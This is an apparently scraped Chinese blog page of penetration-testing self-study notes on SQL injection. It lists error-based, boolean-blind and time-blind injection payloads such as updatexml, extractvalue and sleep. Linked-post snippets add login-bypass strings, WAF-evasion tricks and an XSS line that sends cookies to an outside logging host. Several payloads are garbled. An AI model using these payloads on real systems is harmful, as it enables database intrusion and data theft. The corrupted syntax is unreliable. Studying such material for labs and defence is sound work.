渗透自学(五)SQL注入(三)

最新推荐文章于 2024-07-24 09:39:19 发布
最新推荐文章于 2024-07-24 09:39:19 发布
阅读量979 收藏 2
点赞数
文章标签: sql 数据库 database
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_57449919/article/details/122405912
版权
本文介绍了SQL注入中的报错盲注方法,包括floor、updatexml、extractvalue等多种技术,以及布尔盲注和时间盲注的运用。同时,讨论了如何通过WAF绕过策略,如数据大小写、编码解码、特殊符号利用、参数污染等手段,实现SQL注入攻击。还提到了数据库特性和多种数据库的注释符与空格字符,以及WAF防护中的逻辑问题和性能问题。
摘要由CSDN通过智能技术生成

第十六天(查询方式及报错盲注)

       当进行SQL注入时,有很多注入会出现无回显的情况,其中不回显的原因可能是SQL语句查询方式的问题导致,这个时候我们需要用到相关的报错或盲注进行后续操作,同时作为手工注入时,提前了解或预知其SQL语句大概写法也能更好的选择对应的注入语句。

       简单来说,就是不返回错误信息的,我们就想办法让他返回错误信息

       GET方法中,如果burpsuite在url上加空格,以(+)号代替空格表示

       得到的报错信息显示在网页源码上

       SQL注入报错盲注(有十二种)

  1. 报错盲注(报错回显)(优先)
    1. floor

and select 1 from (select count(),concat(version(),floor(rand(0)2))x from information_schema.tables group by x)a);

    1. updatexml

and 1=(updatexml(1,concat(0x3a,(select user())),1))

    1. extratvalue

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

    1. NAME_CONST

and exists(selectfrom (selectfrom(selectname_const(@@version,0))a join (select name_const(@@version,0))b)c)

    1. join

select * from(select * from mysql.user ajoin mysql.user b)c;

    1. exp

and exp(~(select * from (select user () ) a) );

    1. GeometryCollection()

and GeometryCollection(()select *from(select user () )a)b );

    1. polygon ()

and polygon (()select * from(select user ())a)b );

    1. multipoint ()

and multipoint (()select * from(select user() )a)b );

    1. multlinestring ()

and multlinestring (()select * from(selectuser () )a)b );

    1. multpolygon ()

and multpolygon (()select * from(selectuser () )a)b );

    1. linestring ()

and linestring (()select * from(select user() )a)b );

  1. 布尔盲注(逻辑判断)(其次)
    1. regexp
    2. like
    3. ascii

ascii()返回的是一个位号(0-127)可以从32到127

    1. left

left(obj,num)对obj左起至第num的字符串

    1. ord
    2. mid
  2. 时间盲注(延时判断)(最后)
    1. if

写法:select if(Condition,A,B)

              Condition为真返回A,否则返回B

    1. sleep

写法:sleep(5)

最低0.47元/天 解锁文章
ecnOXong
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[极客大挑战 2019]LoveSQL
qq_37301470的博客
11-12 541
万能密码登录成功没有发现flag 判断藏在数据库里 check.php?username=1' or '1'='1&password=123456' or '1'='1 登陆成功返回的密码 7a2d6a8fd56b61a79bba61ee8f5ad02c 直接开始联合注入 check.php?username=1' union select 1,2,3%23&password=1 check.php?username=1' union select 1,2,database()%23&
WAF绕过
liwenqianye的博客
12-21 2274
WAF绕过 数据 1、大小写变换 如:对某些关键字如:select、union、order、where进行关键字的过滤,能够采用SelEct、UniOn等大小写变换进行绕过。 id=1UnIoN/**/SeLeCT1,user() 2、使用嵌套 如对某些关键字替换为空,能够采用嵌套双写进行绕过,如碰到select或者union等关键字时会将其替换为空,此时能够尝试SELEselectCT、UNIunionON进行绕过。 3、空字节 一些过滤器在碰到空字节会中止过滤,如id=1 %00 and 1=1或id=
【小迪安全】web安全|渗透测试|网络安全 | 学习笔记-4
youngerll的博客
12-30 3368
【小迪安全】web安全|渗透测试|网络安全 | 学习笔记-4
Sql注入
aetlypdlg_ys的博客
01-24 1500
联合注入 判断注入点 GET['id'] ?id=n eg:127.0.0.1/sqli-labs/Less-1/?id=1 %23(#):过滤后面的语句 eg:127.0.0.1/sqli-labs/Less-1/?id=1' %23 加 ' 报错,再加%23(#)不报错,可判断一个注入点 整型注入:注入的是1,2,3...... 字符型注入:注入的是a,b,c,def...... 判断显示位(列) order by n n>列数 -->报错 n<=列数 --&
SQL注入-过安全狗apache4.0
m0_60716947的博客
05-15 943
目录 一、安全狗的安装 二、Fuzz 、过狗 (1)and 绕过 (2)order by 绕过 (3)union select 绕过 (4)database() 绕过 (5)获取其他库 (6)获得所有表 (7)获得所有字段 (8)获得数据 四、总结 一、安全狗的安装 这里有一篇很不错的文章,在安装的过程中出现的问题基本都能在里面找到解决方法 安全狗安装_YsterCcc的博客-CSDN博客_安全狗安装 如果还是不行就找一个装了phpstudy老版本的靶机,比如我上次写.
渗透自学SQL注入(一)
qq_57449919的博客
01-10 1607
渗透基础自学知识,有写的不好的地方请多多指出
SQL注入自学指南
03-21
在"SQL注入自学指南.pdf"中,可能会详细讲解这些概念,通过实例演示如何构造和防御SQL注入,以及相关的工具和技术,比如SQLMap用于检测和利用SQL注入漏洞,以及OWASP ZAP等自动化安全测试工具。此外,还可能包含如何...
web渗透测试笔记.txt
05-11
1、渗透测试框架与流程 2、网络漏洞扫描 3、web漏洞扫描 4、文件上传漏洞 5、文件包含漏洞 7、xss和sql注入 8、php代码注入和os命令注入
80.WHUCTF之WEB类解题思路WP(代码审计、文件包含、过滤绕过、SQL注入)_杨秀璋的专栏-CSDN博客1
08-03
SQL注入是攻击者通过输入恶意SQL语句来控制或获取数据库信息的一种攻击手段。作者可能介绍了如何识别SQL注入漏洞,以及利用注入漏洞进行数据提取或系统控制的方法。解题思路可能包括利用payload构造、错误信息的捕获...
65.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)1
08-03
【网络安全自学篇】六十.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)1 本文主要讲述了网络安全中的靶机渗透技术,特别是通过Vulnhub平台进行环境搭建和JIS-CTF挑战。Vulnhub是一个提供虚拟机...
pikachu.zip
06-05
3. **漏洞**:"sql注入.txt"可能包含有关SQL注入攻击的信息。SQL注入是一种常见的Web应用程序安全漏洞,攻击者通过输入恶意的SQL语句来获取、修改、删除数据库中的数据。了解这种攻击方式和防御策略是网络安全学习的...
SQL注入绕过
imredboy的博客
03-31 1252
0x01 前言 我们经常利用一些数据库特性来进行WAF绕过。在Mysql中,比如可以这样: 内联注释: /!12345union/select Mysql黑魔法: select{x user}from{x mysql.user}; 换行符绕过:%23%0a、%2d%2d%0a 一起去探索一下能够绕过WAF防护的数据库特性。 0x02 测试 常见有5个位置即: SELECT * FROM admin WHERE username = 1【位置一】union【位置二】select【位置】1,user()【
Sql注入笔记
weixin_42357645的博客
09-26 148
##Sql注入笔记 编码: 编码 解码 %23 # 函数: 函数/语句 参数解释 返回值 @@datadir 数据库路径 @@basedir mysql安装路径 version() 数据库版本字符串 length(1)/len(1) 1:字符串 数值 substr(1,2N,3N) 1:字符串 2:起始位置(第一位是1) 3:取N个字符 从2N开始的3N个字符 ascii(1) 1:一个字符 数值 limit 1N,2N 1N:起始位置(第一
细说——SQL注入的常见方式
LainWith的博客
11-04 7214
目录BurpSuite预配置1. 安装CO22. 配置CO23. 小试牛刀使用pikachu靶场的“字符型注入”联合查询(union)函数介绍order byunion selectlimit操作报错盲注1. 获取数据库名2. 获取敏感信息3.获取 mysql 账号密码其他报错函数4. 获取表名4.1 获取第一张表4.2 获取第二张表4.3 获取所有表5. 获取列5.1 获取第一列5.2 获取第二列5.3 获取所有列6. 获取列中的数据6.1 获取第一组数据6.2 获取第二组数据6.3 获取所有数据布尔盲注
SQL注入中,注释#、 --+、 --%20、 %23到底是什么意思?sqli-labs-master
热门推荐
weixin_43096078的博客
08-25 2万+
1.# 和 -- (有个空格)表示注释,可以使它们后面的语句不被执行。在url中,如果是get请求**(记住是get请求,也就是我们在浏览器中输入的url)** ,解释执行的时候,url中#号是用来指导浏览器动作的,对服务器端无用。所以,HTTP请求中不包括#,因此使用#闭合无法注释,会报错;而使用-- (有个空格),在传输过程中空格会被忽略,同样导致无法注释,所以在get请求传参注入时才会使用--+的方式来闭合,因为+会被解释成空格。 2.当然,也可以使用--%20,把空格转换为urlencode编码格式
ctfshow XSS漏洞web316-328
m0_62584974的博客
04-07 1826
2022/4/7 Web316 XSS 反射性XSS 圣诞快乐,写下祝福语,生成链接,发送给朋友,可以领取十个鸡蛋! CEYE - Monitor service for security testing 先在这个网站注册一个账号获得一个临时的域名 红框内的是临时的域名 然后在方框中输入: <script>varimg=document.createElement("img");img.src="http://你的ceye地址/"+document.co..
SQL注入简单总结
Bnessy
12-27 1486
SQL注入的简单总结
SQL Server中 LOP_FORMAT_PAGE日志记录解释
最新发布
qq_55914897的博客
07-24 363
SQL Server事务日志中的一种重要记录类型,负责描述页面整理操作。它在页面初始化、事务日志记录和数据库恢复中扮演了关键角色,确保数据库操作的可靠性和一致性。是一种事务日志记录类型,表示SQL Server对数据页(Data Page)进行删除的操作。详细的背景和任务类型有助于深入理解SQL Server的内部机制,尤其是在恢复和日志管理方面。在数据库恢复过程中,SQL Server会读取事务日志并应用其中的记录和数据。是日志记录的一种类型,用于描述页面的格式化操作。在SQL Server中,
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值